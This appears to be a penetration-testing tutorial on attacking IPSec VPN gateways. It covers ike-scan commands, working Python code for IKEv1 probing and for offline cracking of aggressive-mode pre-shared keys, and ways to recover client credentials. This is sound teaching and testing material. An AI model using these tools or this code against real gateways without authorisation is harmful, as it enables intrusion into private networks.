In this article we discuss penetration testing of IPSec VPNs (Virtual Private Networks). A VPN provides encrypted communication between remote sites or users across the public internet, so that they behave as if they were on the same private network. There are two main types of VPN: IPSec VPNs and SSL VPNs. IPSec is the most widely used protocol suite for establishing secure connections between networks and for connecting hosts to a virtual private network.
Within IPSec, several sub-protocols are each responsible for a specific function:
- Authentication Header (AH): provides connectionless integrity and proof of origin for IP packets, with optional protection against replay attacks. AH does not encrypt the payload.
- Encapsulating Security Payload (ESP): provides origin authenticity, integrity, and confidentiality of the transmitted data.
- Security Association (SA): the set of algorithms and keys used to encrypt and authenticate the transmitted data. An SA covers traffic in one direction only, so two-way communication is secured by a pair of SAs. SAs are established using the Internet Security Association and Key Management Protocol (ISAKMP), in practice through the Internet Key Exchange (IKE), which can be configured in several ways. When testing the security of a VPN (Penetration Testing IPSec VPN), one of the most vulnerable configurations is IKEv1 using preshared-key (PSK) authentication in aggressive mode, which is what the rest of this article targets.
To assess the security of a VPN (Penetration Testing IPSec VPN), penetration testers should follow these basic steps:
- Scanning VPN gateways.
- Fingerprinting VPN gateways (determine vendor and configuration details).
- Finding vulnerabilities associated with the VPN vendor or related products.
- Capturing the preshared key hash (IKE aggressive mode).
- PSK cracking (offline).
- Checking for default user accounts.
Scanning for VPN gateways – Penetration Testing IPSec VPN
To scan for the presence of VPN gateways, use nmap or ike-scan. To use nmap, issue the following command:
nmap -sU -Pn -p 500 <IP Address>
Explaining the above command:
- -sU tells nmap to scan using UDP packets (instead of TCP). IKE runs over UDP, so a TCP scan will not find it.
- -Pn skips host discovery and treats the target as up, so nmap does not first send the ping probes that could alert the target and identify the tester.
- -p 500 selects the port to scan. IKE listens on UDP 500; gateways behind NAT, or configured for NAT traversal (NAT-T), also listen on UDP 4500, so scan both with -p 500,4500.
Because UDP does not acknowledge packets, nmap will usually only report port 500 as open|filtered; it cannot tell a VPN gateway from a silent host. Nmap's ike-version NSE script (--script ike-version) sends a correctly formatted IKE proposal and reports what comes back, but it does not offer the full range of transforms and therefore does not locate every VPN gateway.
The best tool to locate a VPN gateway is ike-scan, which can be found by navigating to Kali Linux | Information Gathering | ike-scan (it may also be preinstalled in Parrot OS). This command-line tool uses the IKE protocol to discover and fingerprint VPN gateways, and it can also extract the material needed for offline preshared key cracking when the gateway accepts IKE aggressive mode. To use ike-scan to locate targets, issue the following command:
ike-scan -M <Target IP>
The execution of the above command is shown in the following screenshot. The summary that ike-scan prints at the end of its output tells you what it found:
- 0 returned handshake; 0 returned notify: This indicates that the target is not an IPSec gateway.
- 0 returned handshake; 1 returned notify: This indicates that although a VPN gateway is present, none of the transforms provided to it by ike-scan are acceptable.
- 1 returned handshake; 0 returned notify: As shown in the previous screenshot, this indicates that the target is configured for IPSec and will perform an IKE negotiation against one or more of the transforms that were offered to it. ike-scan also prints the transform the gateway selected (encryption, hash, authentication method, and DH group), which is the first hint of how the gateway is configured.
Fingerprinting the VPN gateway – Penetration Testing IPSec VPN
If you can establish a handshake with the VPN gateway, you can conduct the fingerprinting of the device to return the following information:
- vendor/manufacturer and model
- software version
The information obtained is used to identify a vendor-specific attack or to fine-tune a generic attack. If the VPN is hosted on a firewall, the fingerprinting will also identify the firewall in use.
The fingerprinting works because IKE runs over UDP and does not itself guarantee delivery, so each VPN gateway vendor implements its own retransmission strategy for traffic that appears to be lost. ike-scan sends an IKE probe to the gateway but deliberately never answers the reply it receives. The gateway behaves as if its packet was lost and retransmits according to its backoff strategy. By recording the time between retransmissions and the number of retries, and comparing that pattern against its database of known vendor patterns, ike-scan can fingerprint the vendor.
The following screenshot shows the process. The -M option prints each payload on a separate line, which makes the output easier to read. The --showbackoff option (as shown in the following screenshot) records the time at which every packet was sent and received, waits 60 seconds collecting retransmissions, and then displays the backoff pattern and the vendor it matches:
ike-scan can also be used to determine whether the gateway supports aggressive mode (--aggressive). Some gateways will not respond to an aggressive mode proposal unless a valid group ID (the identity the VPN client is configured with) is supplied in the identification payload with --id, so without that name the handshake can be hard to obtain.
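The discovery step (the three ike-scan outcomes above) and the backoff fingerprinting just described, as an added worked example. This is my own code, not ike-scan's: it builds an IKEv1 Main Mode SA proposal with a small set of PSK transforms, classifies a reply into handshake / notify / none from the ISAKMP header, reads back the transform the gateway selected, and records the arrival times of retransmissions so their intervals can be compared with a vendor pattern. Constants follow RFC 2408 and RFC 2409; the transform set, probe_gateway, and the two synthetic replies at the bottom are this example's own constructions, not captured traffic.

```python
"""IKEv1 (ISAKMP) probe: build a Main Mode SA proposal, classify the reply as
ike-scan's summary line does, and time retransmissions for backoff fingerprinting.
Added example, not ike-scan's code; the replies at the bottom are synthetic."""
import os
import socket
import struct
import time

# ISAKMP constants (RFC 2408, RFC 2409)
PAYLOAD_NONE, PAYLOAD_SA, PAYLOAD_TRANSFORM, PAYLOAD_NOTIFY = 0, 1, 3, 11
EXCH_MAIN, EXCH_AGGRESSIVE, EXCH_INFORMATIONAL, NO_PROPOSAL_CHOSEN = 2, 4, 5, 14
ENC_3DES, ENC_AES, HASH_MD5, HASH_SHA1, AUTH_PSK, GROUP_MODP1024 = 5, 7, 1, 2, 1, 2
HDR = struct.Struct("!8s8sBBBBII")  # icookie, rcookie, next, version, exch, flags, msgid, len
# (encryption, hash) pairs offered by the probe; assumed set, ike-scan's default is larger
DEFAULT_TRANSFORMS = [(ENC_3DES, HASH_SHA1), (ENC_3DES, HASH_MD5),
                      (ENC_AES, HASH_SHA1), (ENC_AES, HASH_MD5)]

def attr(atype, value):
    """Basic (TV) attribute: AF bit set in the type, two-byte value."""
    return struct.pack("!HH", 0x8000 | atype, value)

def transform_payload(num, enc, hash_alg, last):
    body = attr(1, enc) + attr(2, hash_alg) + attr(3, AUTH_PSK) + attr(4, GROUP_MODP1024)
    nxt = PAYLOAD_NONE if last else PAYLOAD_TRANSFORM
    # generic header, transform number, transform ID 1 (KEY_IKE), reserved
    return struct.pack("!BBHBBH", nxt, 0, 8 + len(body), num, 1, 0) + body

def sa_payload(transforms):
    """SA payload (DOI IPsec, SIT_IDENTITY_ONLY) with one ISAKMP proposal."""
    tbytes = b"".join(transform_payload(i + 1, e, h, i == len(transforms) - 1)
                      for i, (e, h) in enumerate(transforms))
    proposal = struct.pack("!BBHBBBB", PAYLOAD_NONE, 0, 8 + len(tbytes), 1, 1, 0, len(transforms))
    return struct.pack("!BBHII", PAYLOAD_NONE, 0, 20 + len(tbytes), 1, 1) + proposal + tbytes

def build_probe(transforms=DEFAULT_TRANSFORMS, exchange=EXCH_MAIN, icookie=None):
    sa = sa_payload(transforms)
    return HDR.pack(icookie or os.urandom(8), b"\0" * 8, PAYLOAD_SA, 0x10,
                    exchange, 0, 0, HDR.size + len(sa)) + sa

def parse_header(data):
    keys = ("icookie", "rcookie", "next_payload", "version", "exchange", "flags", "msgid", "length")
    return dict(zip(keys, HDR.unpack_from(data))) if len(data) >= HDR.size else None

def classify_response(probe, data):
    """'handshake', 'notify' or 'none': the three outcomes ike-scan reports."""
    hdr = parse_header(data)
    if hdr is None or hdr["icookie"] != probe[:8]:
        return "none"       # no reply, or not a reply to our cookie
    if hdr["exchange"] == EXCH_INFORMATIONAL or hdr["next_payload"] == PAYLOAD_NOTIFY:
        return "notify"     # gateway present, but none of our transforms accepted
    if hdr["exchange"] in (EXCH_MAIN, EXCH_AGGRESSIVE) and hdr["next_payload"] == PAYLOAD_SA:
        return "handshake"  # gateway will negotiate with one of our transforms
    return "none"

def accepted_transform(data):
    """Attributes {type: value} of the transform chosen in a handshake reply."""
    transform = HDR.size + 12 + 8          # skip header, SA payload, proposal payload
    tlen = struct.unpack_from("!H", data, transform + 2)[0]
    attrs, pos = {}, transform + 8
    while pos < transform + tlen:
        atype, value = struct.unpack_from("!HH", data, pos)
        attrs[atype & 0x7FFF] = value
        pos += 4
    return attrs

def backoff_deltas(arrivals, ndigits=1):
    """Intervals between successive retransmissions; the pattern is vendor-specific."""
    return [round(b - a, ndigits) for a, b in zip(arrivals, arrivals[1:])]

def probe_gateway(host, port=500, window=60.0):
    """Send one probe, never answer, and log when each retransmission arrives
    (the idea behind ike-scan --showbackoff). Network use; not run by the tests."""
    probe, arrivals, result, chosen = build_probe(), [], "none", None
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(1.0)
        start = time.monotonic()
        s.sendto(probe, (host, port))
        while time.monotonic() - start < window:
            try:
                data, _ = s.recvfrom(4096)
            except socket.timeout:
                continue
            arrivals.append(time.monotonic() - start)
            if result == "none":
                result = classify_response(probe, data)
                chosen = accepted_transform(data) if result == "handshake" else None
    return result, chosen, backoff_deltas(arrivals)

# Synthetic replies for offline testing (constructed here, not captured traffic)
def fake_handshake(probe, enc=ENC_3DES, hash_alg=HASH_SHA1):
    sa = sa_payload([(enc, hash_alg)])
    return HDR.pack(probe[:8], os.urandom(8), PAYLOAD_SA, 0x10, EXCH_MAIN, 0, 0, HDR.size + len(sa)) + sa

def fake_notify(probe, msg_type=NO_PROPOSAL_CHOSEN):
    body = struct.pack("!BBHIBBH", PAYLOAD_NONE, 0, 12, 1, 1, 0, msg_type)  # DOI, proto, SPI size, type
    return HDR.pack(probe[:8], os.urandom(8), PAYLOAD_NOTIFY, 0x10, EXCH_INFORMATIONAL, 0, 0, HDR.size + 12) + body
```

The classification keys on the initiator cookie, the exchange type and the first payload: a Main or Aggressive Mode reply that starts with an SA payload is a handshake, an Informational exchange or a Notification payload (typically NO-PROPOSAL-CHOSEN) is a notify, and anything else, including silence, is none. probe_gateway(host) returns the classification, the selected transform, and the list of retransmission intervals; matching those intervals against known vendor patterns is the part ike-scan's pattern database provides and is not reproduced here.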
Capturing pre-shared keys – Penetration Testing IPSec VPN
ike-scan can be used to propose IKE aggressive mode to a VPN gateway. This matters because aggressive mode does not protect the preshared key authentication: the authentication hash (HASH_R), an HMAC derived from the PSK together with the nonces, Diffie-Hellman values and cookies exchanged in the clear, is sent before any encryption has been established. The PSK itself is never transmitted, but anyone who captures the exchange has everything needed to test candidate keys offline, which is what the tools below do.
To attempt this against a Cisco VPN concentrator, use the following command (peer is a placeholder for the VPN group name; supply the real group ID if you know it):
ike-scan --pskcrack --aggressive --id=peer <target>
The following screenshot shows the process executed by the command:
To save the captured material in the format psk-crack expects for offline cracking, use the following command (-A is --aggressive, -n is --id, and the output file name is attached directly to -P with no space):
ike-scan -M -A -n peer -Ppsk-hash <target>
Performing offline PSK cracking – Penetration Testing IPSec VPN
Before cracking the captured preshared key hash with an offline tool, edit the output file so that it contains only the hash record: one line of nine colon-separated hexadecimal values (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r). The tool that ships with ike-scan for this is psk-crack, which supports dictionary and brute-force cracking:
psk-crack -d <wordlist> psk-hash
psk-crack -b 5 psk-hash
The same record can also be fed to hashcat, using mode 7300 (IKE-PSK MD5) or 7400 (IKE-PSK SHA1) depending on the hash algorithm the gateway negotiated.
Like all offline cracking exercises, success depends on the work involved: the time, the computational effort, and the energy spent on hardware. A strong preshared key, such as the one shown in the previous screenshot, will take a very long time to crack, so a long random PSK (or certificate authentication and Main Mode) is the real defence.
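What the captured record contains and how psk-crack tests each candidate key, as an added worked example covering both the capture and the offline cracking steps above. This is my own code, not ike-scan's or psk-crack's: it parses the nine-field record, recomputes the RFC 2409 aggressive-mode HASH_R for every candidate (SKEYID = prf(PSK, Ni_b | Nr_b); HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)) and picks HMAC-MD5 or HMAC-SHA1 from the hash length. make_sample_line builds a record for a known key from constructed filler values (not real Diffie-Hellman exponentials, nonces or a real gateway's SA bytes) so that the check runs offline.

```python
"""Offline IKEv1 aggressive-mode PSK cracking on ike-scan's psk-crack record format.
Added example, not psk-crack's or ike-scan's code. The sample record is built
from constructed filler values with a known key so it can be checked offline."""
import hashlib
import hmac

# Field order of one 'ike-scan --pskcrack' record (all values hex-encoded)
FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")

def parse_psk_line(line):
    """Parse one record: nine colon-separated hex fields, nothing else on the line."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError("expected %d fields, got %d" % (len(FIELDS), len(parts)))
    return {name: bytes.fromhex(value) for name, value in zip(FIELDS, parts)}

def prf_for(rec):
    """The PRF is HMAC over the negotiated hash; infer it from the HASH_R length."""
    size = len(rec["hash_r"])
    if size == 16:
        return hashlib.md5
    if size == 20:
        return hashlib.sha1
    raise ValueError("unsupported HASH_R length %d" % size)

def hash_r_for(rec, psk, digest):
    """RFC 2409 section 5.4: SKEYID from the PSK and nonces, then HASH_R over the exchange."""
    skeyid = hmac.new(psk, rec["ni_b"] + rec["nr_b"], digest).digest()
    msg = (rec["g_xr"] + rec["g_xi"] + rec["cky_r"] + rec["cky_i"]
           + rec["sai_b"] + rec["idir_b"])
    return hmac.new(skeyid, msg, digest).digest()

def crack(line, candidates):
    """Return the first candidate whose recomputed HASH_R matches the captured one."""
    rec = parse_psk_line(line)
    digest = prf_for(rec)
    for cand in candidates:
        psk = cand.encode() if isinstance(cand, str) else cand
        if hmac.compare_digest(hash_r_for(rec, psk, digest), rec["hash_r"]):
            return psk.decode(errors="replace")
    return None

def crack_wordlist(line, path):
    """Dictionary mode: stream a wordlist file through crack()."""
    with open(path, "rb") as f:
        return crack(line, (w.rstrip(b"\r\n") for w in f))

# Constructed sample: the record a gateway using the given PSK would leave behind.
# The DH values, cookies, nonces and SA bytes are deterministic filler, not real traffic.
def make_sample_line(psk, digest=hashlib.sha1):
    rec = {
        "g_xr": b"\x01" * 128, "g_xi": b"\x02" * 128,          # 1024-bit DH public values
        "cky_r": b"\x03" * 8, "cky_i": b"\x04" * 8,             # ISAKMP cookies
        "sai_b": bytes.fromhex("00000001" "00000001" "00000001"),  # initiator SA body (filler)
        "idir_b": b"\x01\x00\x00\x00" + bytes([192, 168, 1, 1]),   # ID type IPv4 addr + address
        "ni_b": b"\x05" * 20, "nr_b": b"\x06" * 20,              # nonces
    }
    rec["hash_r"] = hash_r_for(rec, psk.encode(), digest)
    return ":".join(rec[name].hex() for name in FIELDS)
```

Every candidate costs two HMAC computations, which is why a dictionary of a few million entries finishes in seconds on a laptop and why a long random PSK is out of reach: the only secret input is the PSK, and everything else in the record is public.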
Identify default user accounts – Penetration Testing IPSec VPN
Like most other hardware devices, VPN gateways usually ship with default user accounts, and administrators do not always change them. Using the vendor and version information gathered during fingerprinting, a penetration tester can search the vendor documentation and public default-credential lists to identify the standard accounts and try them.
If the tester has access to a user's computer, the VPN client configuration (profile files or, on Windows, the registry) usually stores the username, gateway address and group name, and for some clients an obfuscated group password whose encoding is reversible. Furthermore, if the tester can obtain a memory dump of a client system while the VPN client is running, it is possible to recover the password directly from memory. VulnVPN is a deliberately vulnerable virtual machine running an IPSec VPN server. It allows you to apply the tools described in this article to compromise the application and gain root access without damaging a production system.